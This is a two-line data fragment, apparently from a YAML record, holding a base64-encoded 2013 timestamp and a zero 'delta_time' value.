TW9uIEZlYiAxMSAwODoxOTo1MyAyMDEz
delta_time: '00:00:00'